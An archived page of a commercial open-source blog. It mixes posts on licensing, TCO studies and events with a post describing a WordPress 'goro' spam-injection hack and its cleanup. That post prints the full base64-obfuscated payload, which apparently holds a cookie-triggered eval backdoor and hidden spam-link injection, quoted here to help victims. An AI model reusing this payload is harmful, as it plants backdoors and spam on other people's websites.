Commercial Open Source Software

Recent Updates Page 88 Toggle Comment Threads | Keyboard Shortcuts

Roberto Galoppini 10:06 pm on December 12, 2007 Permalink | Reply
WordPress Spam Injection: ‘Goro’ hacked my blog
Two days ago a my Northern European friend Era after reading a post adviced me that my blog site have been silently owned by Search Engine spammers. Spam in blog is definitely not a new phenomenon, but I knew very little of spam injection before, and I hope my experience can help other WordPress users.

The problem was that a foreign div loads in the header “div id=goro“, and a list of spam links to various porn links. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.

Within the theme’s page header.php, hacked using likely a wordpress 2.0.1 bug:
```
create_function('', get_option("blog_headers")); ?>

[snipped code]
```
```
<?php $wp_headers() ?>
```
Actually those lines of code were calling the code contained within the database in the blog_headers option (“wp_options” table, option_name = ‘blog_headers’):

611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25f254b
7f8f3611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25
f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
QoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn
NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYgK
Glzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRF
U1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlI
Chpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAk
X0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmx
lbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvb
GFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy
8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpO
woJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbig
nYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODh
kZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2
ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7
Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7Cgkkd
WEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQ
oJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib
3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS
9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VS
SSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gd
W5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKS
k7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCS
R3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdG
lvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0
b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQk
JCSRzZWVkID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBMQVNUX0lOU0VSVF9
JRCgpIik7CgkJCQkJdXBkYXRlX29wdGlvbigkcnNzLGJhc2U2NF9lbmNvZGUoc2
VyaWFsaXplKGFycmF5KCRzZWVkLCRycSkpKSk7CgkJCQl9IGVsc2UgewoJCQ
kJCSRzZWVkID0gJHNlZWRbMF07CgkJCQl9CgkJCQkkdGV4dCA9IGJhc2U2NF
+JHdjKSB7CgkJCQkJJHNlZWQtPSR3YzsKCQkJCX0KCQkJCWVjaG8gJzxkaXY
gaWQ9Imdvcm8iPic7CgkJCQllY2hvIGpvaW4oIiZuYnNwOyIsYXJyYXlfc2xpY2
UoJGEsJHNlZWQqMzAtMzAsMzApKTsKCQkJCWVjaG8gJzwvZGl2PjxzY3JpcHQ
gdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4nOwoJCQkJZWNobyAiZnVuY3Rpb24g
Z2V0bWUoc3RyKXsgdmFyIGlkeCA9IHN0ci5pbmRleE9mKCc/Jyk7IGlmIChpZHg
gPT0gLTEpIHJldHVybiBzdHI7IHZhciBsZW4gPSBzdHIubGVuZ3RoOyB2YXIgbm
V3X3N0ciA9ICcnOyB2YXIgaSA9IDE7IGZvciAoKytpZHg7IGlkeCA8IGxlbjsgaW
R4ICs9IDIsaSsrKXsgdmFyIGNoID0gcGFyc2VJbnQoc3RyLnN1YnN0cihpZHgsID
IpLCAxNik7IG5ld19zdHIgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoY2ggKyBp
KSAlIDI1Nik7IH0gZXZhbChuZXdfc3RyKTsgfSI7CgkJCQllY2hvICJnZXRtZSgna
HR0cDovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93
X2Fkcy5qcz82MzZENjA3MTY4NUY2NzZDMjU1RDVBNjgzODVFNTY1RDU0NUM
2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0
MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl
9Cgo/Pg==’;$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;

Decoding it with base64_decode came out that such code calls an external javascript that pastes on the fly some spam links in the page, writing also in the option field strings of this form rss_*, like the following:

mysql> select option_value from wp_options where option_name =

‘rss_fffbb7d85fc00f0c0d14abf4fde94ce3’;

+————————————+

| option_value
|+————————————+

| YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |

+————————————+

Besides erasing the above mentioned lines from the header.php, you need also to erase blog_headers and ‘friends’ from the database:

delete from wp_options where option_name = ‘blog_headers’;delete from wp_options where option_name like ‘rss_%’ and option_name

not in (‘rss_language’,’rss_use_excerpt’,’ rss_excerpt_length’);

Find the offending goro spamware injection before google bans you from internet pipe. Amazingly as soon as I got it fixed my blog got its previous position.

Note: My blog is under repair these days, the old theme will soon be available, along with twitters and skype alert. Sorry about that.
Technorati Tags: wordpress, goro, spam injection, blog spam, FrancescoMosca
Graham, meneame.net, RaiulBaztepo, and 10 others are discussing. Toggle Comments
- vseo 12:14 pm on January 8, 2008 Permalink
  
  Same on footer, same solution
- Gordon Dewis 11:01 pm on March 13, 2008 Permalink
  
  You’re not alone in this. I found myself a victim of it after upgrading my WordPress to 2.3.x in December. Fortunately, I found someone else who had encountered it and their blog had some suggestions on how to deal with it. I blogged about the experience on my blog at http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/
  
  It’s amazing how many people are still affected by it.
- Apollo Lee 5:56 pm on April 30, 2008 Permalink
  
  Thanks for posting this. While a similar exploit only got my main blog, your post here really helped me know what to look for in the database. Combined with the WordPress 2.5.1 post over at WordPress.org, I was able to get this problem handled.
  
  I guess that’ll teach me to keep my software up to date. I wonder how long it’ll take until I’m back on Technorati and Google Blogsearch.
  
  Thanks again for your post.
- Roberto Galoppini 9:27 am on May 1, 2008 Permalink
  
  I am really glad it helped you, when I got in troubles I felt really hopeless. As a matter of fact google has proven to be really fast to give my rank back, and I wish you best of luck with that.
- Oliver 12:11 pm on June 6, 2008 Permalink
  
  Good article! your site let me learn more. Thanks!Pls keep up to date.
- Aaron Wall 8:47 am on June 14, 2008 Permalink
  
  Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.
- joe 12:48 pm on July 3, 2008 Permalink
  
  Hi, why don’t you activate the akismet spam? I have that kind of spam in few blog.
- Roberto Galoppini 4:03 pm on July 3, 2008 Permalink
  
  I do Joe, I do.
- Maria 12:14 pm on August 1, 2008 Permalink
  
  Very useful information for me. Thank you.
- Hacker Forums 9:01 pm on October 7, 2008 Permalink
  
  Most all blog hacks are from people not upgrading their blog software.
  
  If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.
- wynajem kamperÃ³w 3:42 pm on October 22, 2008 Permalink
  
  Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.
- RaiulBaztepo 11:25 pm on March 28, 2009 Permalink
  
  Hello!
  Very Interesting post! Thank you for such interesting resource!
  PS: Sorry for my bad english, I’v just started to learn this language 😉
  See you!
  Your, Raiul Baztepo
- Graham 3:39 am on November 12, 2010 Permalink
  
  I’ve been seeing a lot of chat lately on WordPress security problems. They are currently leading in the blog race, but will, for sure, start losing people unless they show some dramatic improvement very soon.
  
  Sorry about your problems but glad you found a fast fix and we’re restored to your previous Google rank.
  
  Graham
Reply
Required fields are marked *

Name *

Email *

Website

Save my name, email, and website in this browser for the next time I comment.

Δ
Roberto Galoppini 9:31 pm on December 10, 2007 Permalink | Reply

Open Source ECM: Alfresco opens up to social networks
After the announcement of the integration with Facebook Alfresco made public that Alfresco Social Computing Platform – which integrates Alfresco with Adobe Flex, Facebook, iGoogle, MediaWiki, TypePad and WordPress – will be available for download by tomorrow on SourceForge.

While Alfresco is probably not the first open source projects to experiment with Facebook, John Newton – co-founder and Chief Technical Officer of Alfresco – believes that pushing for the expansion of social computing in the enterprise is an imperative. John on his “manifesto for Social Computing in the Enterprise” states:

The next generation of enterprise employees who started using the internet in their early teens have only known this evolving culture of free and creative development of the internet and now demand better of the enterprise software that they meet.

While I don’t know if every CTO should be on Facebook, as says Jon Williams at the New York CTO blog, I believe Seth Gottlieb‘s theory is correct:

most Intranets fail as social collaboration tools because they cannot capture the energy and passion that seems to form spontaneously on the web. And my theory goes on to assert that people do not invest their personal energy on their corporate intranet because they don’t own it.

John, why are you addressing Facebook audience?

In order for ECM to move from 10% that are specialists in a firm (compliance, doc control, regulatory, maintenance and web sites) to the 90% that need it to control out-of-control information on shared drives, it would need to introduce compelling user interfaces based upon social networking and social computing.

I think Alfresco did a great move addressing needs of the new generation of knowledge workers is enabling a new enterprise vision of social computing.

Last but not least Alfresco rather than building everything on its own is defining an architecture of participation based on Web Scripts Framework. Let’s see if it will eventually help them to foster their community.

Technorati Tags: Alfresco, JohnNewton, SethGottlieb, JonWilliams, Social Software, Facebook, oss, commercial open source, open business
Roberto Galoppini 8:03 pm on December 9, 2007 Permalink | Reply

Barcamp: Piublog 2007
The fourth Roman barcamp – Piublog 2007 – took place today within the event “PiÃ¹ libri piÃ¹ liberi” (eng.: more books, more freedom), the annual fair of the independent Italian publishing houses, held since 2002. A good chance to meet again old friends or why not make new ones on a gloomy, raining day in Rome.

Leo Sorge was a very nice host, embarrassed because the venue actually wasn’t totally appropriate for a barcamp, being just a single room and lacking of Wi-Fi facilities. Fabio Masetti opened the barcamp, later Riccardo Cambiassi – who originally “imported” the barcamp in Italy – impressed me with a cool slideshow on barcamping.
In the afternoon I enjoyed Nicola Mattina on corporate blogging, and Piergiorgio Lucidi introduction to microformats and Semantic Web.

I spent also time talking with people, among others Antonio Pavolini, Andrea Martines,Â Feba, Giulio Gaudiano e StefanoÂ Epifani. I met for the very first time Dario Salvelli and I suggested Nicola Risitano (LSLUG, OpenCamp) to have a look at the Open Source Guide for SMEs. Andrea Genovese was supposed to talk about his coworking project, but eventually Fabio Masetti spoke on behalf of him.

Technorati Tags: barcamp, piublog

Piergiorgio Lucidi, antoniocontent, Dario Salvelli, and 1 other are discussing. Toggle Comments
- Riccardo 11:37 am on December 10, 2007 Permalink
  
  Ciao Roberto!
  Ãˆ stato un piacere conoscerti. Grazie dei complimenti, immeritati.
  Le slide non abbiamo fatto in tempo ad esplorarle per bene ma le trovi su SlideShare se ti interessano.
  Spero di sentirti presto, fammi sapere quando passi da Londra!
  
  R
- Dario Salvelli 2:42 pm on December 10, 2007 Permalink
  
  Roberto, i’am really nice to met you: i hope to talk more for the next time..
  
  Ehi, take care!!!
- antoniocontent 12:45 pm on December 14, 2007 Permalink
  
  Nice to meet you, and sorry we could n’t spend more time for our chat.
  
  I wish you a quick recovery!
  
  Cheers,
  
  🙂
  
  a
- Piergiorgio Lucidi 7:41 pm on February 4, 2009 Permalink
  
  Thank you for your feedback about my talk during this event!
  
  Thank you again for your feedback sent to Sourcesense: now I’m working in a real Open Source company 😀
  
  Ciao
  Piergiorgio
Roberto Galoppini 10:34 am on December 8, 2007 Permalink | Reply

Free Software Foundation Europe: The strange case of Certified Open
Stefano Maffulli‘s post “managing a non-profit organization is real business” let me wonder about the importance of transparency within free software organizations here in Europe.

Shouldn’t I pose such questions? by brighterworlds

Recently I happened to ask twice Georg Greve, Free Software Foundation Europe President, about why FSFE is partnering with Open Forum, supporting “Certified Open” (tm).

The Open Forum Europe is definitely not a story of a success. The EC-funded projects, started in September 2005 ended at the beginning of this year, and we didn’t see any of the following promises realized:

The aim of The OpenForum Europe (TOF-e) project is to put certainty and commercial clarity into the whole Open Source process. It will assist SMEs, Enterprises and the Public Sector in the pragmatic adoption and support of OSS by intermediating between business users and the OSS developers, integrators and support community across Europe.
TOF-e represents the specific market validation phase of this eTEN project to rollout TOF-e across Europe and consists of 3 local portals in Denmark, Ireland and the UK.

So said, why is FSFE supporting one of TOF-e’s creatures?

Googling around I noticed that Shane McCoughan, FTF coordinator at FSFE had some remarks about Certified Open, talking of misapplications of language and concepts. Shane a couple of weeks later joined Certified Open Ltd, and actually is one of FSFE’s representatives on the Certified Open board.

The question is still open.

Technorati Tags: oss, open business, FSFE, Certified Open, ShaneMcCoughan, GeorgGreve, StefanoMaffulli
Roberto Galoppini 11:14 am on December 7, 2007 Permalink | Reply
Open Source Brand: No Logo Open Source?
My post about SugarCRM’s original way to abide the GPL yesterday has been reported by Matt Asay, raising the open source brand issue. Building a brand takes time and money, and just like in any other market drives the demand. What is specific to open source branding?

Logo meltdown by Asta

On the 20th of August 1997 the Linux trademark dispute was resolved, since then anyone in the open source community knows about the importance of brand names. Later on Red Hat started to protect its trademark, bringing the dispute on a commercial ground.

The non-excludable nature of open source code makes difficult to prevent competitors from “stealing” customers, and the argument on the table is, in Matt’s words:

You can give away your software. You should never give away your brand.

Trademark laws all over the world enable consumers of products to know the (real) source of the products they use, allowing them to distinguish those products from the products of other vendors. Consumers this way can’t be fooled into purchasing a product or a service of one company while believing it is a product of another company.

Few open source firms have the ability to deliver worldwide open source services and support, and the demand for entrepreneurial open source ecosystems is much greater than the supply. Newcomers and open source incumbents could better exploit the opportunity to collaboratively create ecosystems. Open source product firms could re-invent different channel programs, providing qualified resellers with the real ability to deploy even complex solutions. On the other hand newcomers should stop thinking that re-branding third-parties’ open source products is enough.

There are still just two ways to make money from OSS, named â€œbest code hereâ€ and â€œbest knowledge hereâ€ approaches, but none of them scale very well, unless you know how:
- to become the market leader;
  .
- to manage collaborative software development.
But appropriating returns is critical and Open Source Franchising is still a good option.

PS: Matt, “badgeware” is probably the most used expression referring to the visibility constraint, which I am not saying is bad at all. Protecting Open Source IP is important, I agree.

Technorati Tags: oss, open business, open source brand, open source marketing, sugarCRM, MattAsay
Roberto Galoppini and Geoff SoftwareClub Dodd are discussing. Toggle Comments
- Geoff SoftwareClub Dodd 10:10 am on December 15, 2007 Permalink
  
  As i see it, open source has a real branding problem. Something like OpenOffice just hasn’t had the brand build up of a suite like Ms Office. So people automatically lower their expectations and their interest. Same with Gimp and a branded graphics application. Same perceptions and lowered image and expectations.
- Roberto Galoppini 9:08 pm on December 16, 2007 Permalink
  
  I wouldn’t say that Open Source has, at large, a branding problem. Few open source programs and platforms are quite in the know today. For example, talking about OpenOffice.org, I can tell you that only in September in Italy it got mentioned in more than 200 articles. Not bad, I would say.
  
  On the other side is true that most of OS programs are unknown, and that is why I believe there is a need for open source awareness campaigns.
Roberto Galoppini 2:28 pm on December 6, 2007 Permalink | Reply

Open Source Marketplace: SourceForge Marketplace goes live!
SourceForge last March announced a new feature to buy or sell services for Commercial Open Source on SourceForge, eventually launched in early summer in beta. Right now SourceForge released its SourceForge Marketplace, and 512 Service Providers and 251 Projects are available.
Openbravo ERP is probably the most famous among the supported projects, nonetheless we should probably pay more attention to the (very) long tail. If we look at the estimation of the real number of active FLOSS projects done within FLOSSMETRICS, there are 18000 stable and mature projects out there.
The SourceForge Marketplace could help to monetize open-source projects, but can also foster communities and, even more interesting, super-communities.

Could products like SuiteTwo come to life within the SourceForge community?

European countries like Germany, Italy, Spain, France and UK sum up about 30% of the SourceForge’s 25 million unique visitors. Here there is clearly space to positively contribute to the European open source adoption.

Full Disclosure: I am on SourceForge.net Marketplace advisory board.
Technorati Tags: oss, open business, open source marketplace, sourceforge
Roberto Galoppini 2:48 pm on December 5, 2007 Permalink | Reply

Open Source Social Software: Gartner on Open Source Products
On the 24th of October Gartner released the Team Collaboration and Social Software Magic Quadrant by Nikos Drakos. The document report about a revitalized collaboration support market, including also some open source products.

Nice start by Maszcha & J

While Gartner did yawn on Open Source BI, this Magic Quadrant includes products from less-established vendors, and eventually open source products got their chance. More important Drakos paid attention to the presence of independent activities adding value to the core product, where open source add-ons can play a decisive role.

Deki Wiki (MindTouch) originally based on MediaWiki, ICE core (SiteScape), Movable Type (Six Apart), SocialText (SocialText) and Twiki (Twiki.net) got all mentioned.

Ross Mayfield is pretty happy, that SocialText is considered the most visionary provider and behind only Microsoft, BEA and IBM in execution.

This tells me that if we want to be the leader we need to demonstrate better execution (mind you, I’m not taking out IBM next year, but it is good feedback). SuiteTwo, of which we are a core component, also scored well in vision but has a way to go in execution.

Execution. Open Source firms need to work hard on that, and it is a general issue. The absence of “horizontal” players in Europe, such as SpikeSource of the above mentioned SuiteTwo, is an open issue.

Getting back to Gartner, I am looking forward to read “Open Source Magic Quadrant”, Magic Quadrant reporting more open source specific information about those products. As seen with Social Software there are a lot of open source products that are enterprise ready, so a qualification method allowing to differentiate the open source numerous candidates is needed.

A good starting point would be the QSOS metrics. Should I elaborate it further?
Technorati Tags: oss, open business, social software, team collaboration, SocialText, RossMayfield, Twiki, Deki Wiki, Movable Type, ICE Core, Six Apart, SiteScape, MindTouch, Spikesource, SuiteTwo, MediaWiki, NikosDrakos
Roberto Galoppini 3:56 pm on December 4, 2007 Permalink | Reply

Open Source TCO: look at the COSPA recommendations (part 2)!
The EC funded COSPA project defined two frameworks to better understand open source software adoption and cost of migrations in public administrations. COSPA findings below reported grounded as they are in practical cases, form a basis for management and policy-makers, interested in this area.

Today’s recommendations by shinyai

The “Report evaluating the costs/benefits of a transition towards ODS/OS for each key task related to personal productivity used in the PAs under study” – available thanks to the Wayback Machine – benchmarks the effectiveness of the deployed OSS solutions through a statistical and cost/benefit analysis using those frameworks.

The study has been conducted applying the framework on assimilation theory, identifying the most relevant factors. Then such assimilation factors have been differentiated into facilitators and inhibitors to OSS adoption. The last section of the document eventually present a study on the migration costs and the cost of ownership.

COSPA work compares in detail 6 PAs (Beaumont Hospital – Ireland, SGV – Italy, Extremadura – Spain, Skopje – Macedonia, Pisa – Italy and TÃ¶rÃ¶kbÃ¡lint – Hungary) in terms of assimilation models and migration costs.
On the basis of its findings, COSPA has formulated the following recommendations.

Recommendation 1. (achieving a general level of OSS deployment) To achieve a general deployment of OSS, COSPA recommends that PAs focus on the specific facilitators and inhibitors to OSS assimilation we have identified, prior to migration. Specifically, COSPA suggests recognising that technological benefits of OSS outweigh its disadvantages – e.g. ability to tailor to precise needs, transparency – as these are important facilitators in the assimilation of OSS. In contrast, it is important to overcome the perception that employees might feel their work is under-valued if using ‘cheap’ OSS products, and also the perception that changing operating models to OSS might be problematic – e.g. no contracted maintenance support.

Recommendation 2. (savings on costs) To base the decision to migrate to OSS to save on licenses costs alone is unrealistic as they are only initial costs, all too easily influenced by inflation and market fluctuations over time. COSPA recommends the decision to be based on two related evaluations: costs of migration and costs of ownership. The former involves high investment for a shorter period, while the latter foresees expenditure for maintenance over a period of at least five years. In the migration, COSPA findings report that a substantial factor are the intangible costs such as costs for peer training. COSPA also reports that there are no extra costs due to lack of productivity arising from the use of the OSS solution. Although training costs are a substantial part of the migration costs their benefits can be realised over the long term in terms of costs of ownership. People are more conscious of the software they work with when they have been trained on open source code. This gives more power to them in negotiating fees for consultancy and maintenance.

Recommendation 3. (barriers in migration to OSS). As any new radical IT innovation, a transition to OSS involves the discussion on barriers to migration. COSPA analysis has reported that barriers may arise in several areas: a lack of knowledge/experience in relation to what OSS products are appropriate and how they might be deployed. COSPA recommends a policy of both ad hoc and periodic training to help achieve the benefit of a transition to OSS. In the COSPA findings, some of the technical reasons that determined the success of a migration were exchange of documents in an open shared format (ODS), utilization of old hardware in high schools, being independent of software vendors even when creating a distribution or an application for local needs. COSPA recommends considering this factor before deciding to migrate, as the migration costs might not be really affordable and other reasons may need to be taken into consideration.

Technorati Tags: oss, open business, COSPA, migration, recommendations
Roberto Galoppini 4:27 pm on December 3, 2007 Permalink | Reply
Open Source TCO: look at the COSPA frameworks (part 1)!
The EC funded COSPA project recently mentioned, defined frameworks to identify possible returns or losses of a transition to Open Data Standards or Open Source software.

Two frameworks by clbaran

The Workpackage 3 derived two frameworks. The first one, from assimilation theory, is aimed at investigating adoption, is in relation to the often-found gap between initial acquisition and eventual adoption of a technology.

Acquiring Open Source software is easy, so the distinction between the adoption events of acquisition and actual deployment of a technology is of great importance. Considering that most of the time there is no blueprint indicating the required steps to guarantee successful deployment of OSS, the gap between the acquisition and actual deployment is often significant.

The following set of constructs form the framework used to investigate the assimilation of Open Source software:
- Organization age & size – Older organizations are expected to be risk averse and less likely to undertake radical IT implementation initiatives such as OSS. Also, larger organizations may be better able to leverage the advantages of new technology, and have access to appropriately skilled personnel.
  .
- Industry type – Certain industry types may be more capable of leveraging the benefits of technology as it may suit their particular value chain configuration.
  .
- Strategic investment rationale – Strategic value propositions may justify resource commitments to adopt potentially beneficial technologies.
  .
- Increasing returns to adoption – Economies of scale and network externality effects may arise through the increasing contribution of additional adopters.
  .
- Knowledge barriers – extent of experience – Assimilation of new technology can be impeded by lack of relevant knowledge or experience.
  .
- Top management championship – New technology assimilation may require radical and high-risk initiatives that require proactive top management championship.
  .
- Extent of coordination – Coordination of knowledge across functional units of the organization can promote risk sharing & educate as to benefits of new technology.
  .
- Sophistication of IT infrastructure – Organizations with sophisticated IT infrastructure are more likely to have higher levels of knowledge about new IT possibilities, and thus embark on innovative IT assimilation.
The second framework – related to the cost of transition – is aimed at revealing the causes of costs in relation to a specific context, especially to determine lock-in situations or to identify intangible costs. Intangible costs represent 75% of the IT when effects of innovation and productivity are monitored over more than five years, hence the importance to assess such costs.

TCO takes into account hidden costs and their propagation in the long run better than ROI, but also Switching Costs are important to better understand lock-in situations. Some switching costs are created by the vendor (endogenous) and are often measurable, others are exist in their own (exogenous), like the cost of gathering information about alternative products or vendors. Implicit costs, as customer uncertainty, are not measurable and often not even identifiable.

The framework used to assess the cost a transition to OSS take into account the Migration path (total migration from proprietary, partial from proprietary, partial from mixed, from scratch), the Type of Administration (High/Low economic resource growth, High/Low size of the organization) and with a strong emphasis on the difference between volatile nature of costs of migration and the cost of ownership.

Both migration and ownership costs depend on context, types of migration and organization, as above discussed. The framework defines measures and questions about five main causes of costs:
1. Learning/training.
  .
2. Software.
  .
3. Contracts.
  .
4. Staffing.
  .
5. Support.
  .
The next post will cover some case studies, focusing on how Open Source software is being used by public authorities across Europe.
Technorati Tags: oss, open business, COSPA, migration
Roberto Galoppini 12:29 pm on December 2, 2007 Permalink | Reply

Open Source Licensing: SugarCRM’s original way to abide the GPL
After discussing why SugarCRM would have no reason to adopt the AGPL, yesterday I happened to download the Sugar Community Edition from the download page. The About page let me wonder about a possible attribution loophole in the GPLv3.

A new light by MumbleyJoe

Some licensing background first. Here an excerpt from the About page of the Sugar Community Edition 5.0:

The interactive user interfaces in modified source and object code versions of this program must display Appropriate Legal Notices, as required under Section 5 of the GNU General Public License version 3.

In accordance with Section 7(b) of the GNU General Public License version 3, these Appropriate Legal Notices must retain the display of the “Powered by SugarCRM” logo. If the display of the logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices must display the words “Powered by SugarCRM”.

Surprisingly it looks almost like the previous version of the about page (courtesy of Koder search engine):

All copies of the Covered Code must include on each user interface screen:
(i) the “Powered by SugarCRM” logo and
(ii) the SugarCRM copyright notice
in the same form as they appear in the distribution.See full license for requirements.

I am not a lawyer, but f I got it right, Section 7 of the GNU GPL version 3 permits modifications to the license for certain terms. Section 7 (b) asserts that for material you add to a covered work, you may supplement the terms of this License with terms:

b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it;

Section 7 became a viable tool to reintroduce somehow the attribution addendum contained in the SugarCRM Public license (Exhibit A).

The question is: is requiring a logo a reasonable author attribution? I presume this is the case, at least in Eben Moglen‘s opinion. Moglen in his “SugarCRM’s Sweet Taste of Freedom” stated that SugarCRM is to be applauded, and I believe he knew already what I just found myself.

Badgeware is not only OSI approved, but it is also endorsed by the Free Software Foundation now, with its flagship license. The debate is over.

Back to my analysis about SugarCRM’s licensing strategy, it is now clear that SugarCRM and SugarCRM’s VCs do still care a lot about brand protection. Their unique selling points are really strong, but as a matter of fact they found a way to accomplish both goals: branding and the adoption of a much more compatible license.

Kudos to SugarCRM’s lawyers to sort it out.

Technorati Tags: oss, open business, commercial open source, sugarCRM, GPL, FSF, OSI

tecosystems » links for 2007-12-06, Roberto Galoppini, Michel, and 2 others are discussing. Toggle Comments
- Johan 3:25 pm on December 3, 2007 Permalink
  
  Interesting note but you miss a big point, GPL3 does not address the distribution of software over the internet. The terms in the license address distribution or re-distribution by the old methods. Google re-distributes MySql over the web and is not bound to submit their modifications back to MySql. We could all make significant additions to SugarCRM and host the advances with no need to submit them back to the community. We could even host SugarCRM and offer it for free. The cost of hosting has gone down significantly, do I smell a advertising model ? I may host SugarCRM for free just for the heck of it. My company does some modifications and we’ll have a better CRM solution and no need to share this with SugarCRM.
  
  SugarCRM made a big mistake!!!! I am not sure why you are looking to rationalize bad decisions by a company that should have been smarter. This was a critical mistake and will affect their future!
- Roberto Galoppini 6:35 pm on December 3, 2007 Permalink
  
  Johan,
  
  I have extensively talked about the GPL loophole before, that’s why I didn’t mention it here.
  
  SugarCRM has some unique selling points (see the above mentioned post), and it is definitely not trivial to spoil their business.
  
  About SugarCRM’s strategy, I must tell you that I am quite impressed by their community: they look pretty smart, honestly.
- Johan 1:13 am on December 4, 2007 Permalink
  
  Hello Robert,
  
  Thank you for the reply but I still see tremendous exposure for SugarCRM. On a big picture level, I really don’t see how they can go public and file an S-1 listing the business risks and have anyone back their offering. The hosting of SugarCRM for free with focused updates that make “my version” a better solution would be a killer for them. Keep in mind they would be burdened with the heavy lifting of the core system whereas my “company” could focus on additional features. That is a big benefit for me and to Sugar’s detriment.
- P.Woods 8:31 pm on December 9, 2007 Permalink
  
  What does “original way to abide the GPL” mean?
  I can’t think of the word you really meant instead of “abide.”
- Roberto Galoppini 5:40 pm on December 10, 2007 Permalink
  
  It is pretty original because no one took publicly advantage of the section 7 of the GPLv3 for this purpose yet.
- Michel 11:28 pm on January 5, 2008 Permalink
  
  I must agree with Johan’s comment, the GPL3 licensing approach or interpretation of it by SugarCRM is quiet questionable indeed. It is a scary accommodation for anybody planning to use this project in the long term. And the question remains… what and when will be the next amendment made…
  
  It appears like a big contradiction where one extensive use of available source code and ideas has very little ‘reconnaissance’ in regards to its ‘sub’ stance . What about the amazing community of contributors which has helped SugarCRM expand upon its grand business scheme? Base on its licensing condition, I could just imagine what it would look like if all the ingenuous creators had little icons showing what they did or come up with on SugarCRM.
  
  As an organization SugarCRM has the merit for good integration of LAMP. One must also admit its marketing attraction strength which brings common richness to all with a lite subtle condition to its use. But one must wonder what this tiny little licensing condition might hold for the future?
- Roberto Galoppini 12:22 pm on January 6, 2008 Permalink
  
  Michel I think it is important to sort out if it is the GPL3 licensing approach or interpretation of it by SugarCRM. What I am saying, and I am not alone, is that the Free Software Foundation, Eben Moglen and open source attorneys like Mark Radcliffe they all know that.
  
  I am not convinced that it is a scary accommodation, on the contrary I firmly believe it doesn’t make free software less free.
  Quoting you:
  
  What about the amazing community of contributors which has helped SugarCRM expand upon its grand business scheme? Base on its licensing condition, I could just imagine what it would look like if all the ingenuous creators had little icons showing what they did or come up with on SugarCRM.
  
  Attribution probably is not the best ever solution, but it sounds like the most appropriate when we talk of corporate production model.
  
  Democracy does not guarantee equality of conditions – it only guarantees equality of opportunity (Irving Kristol).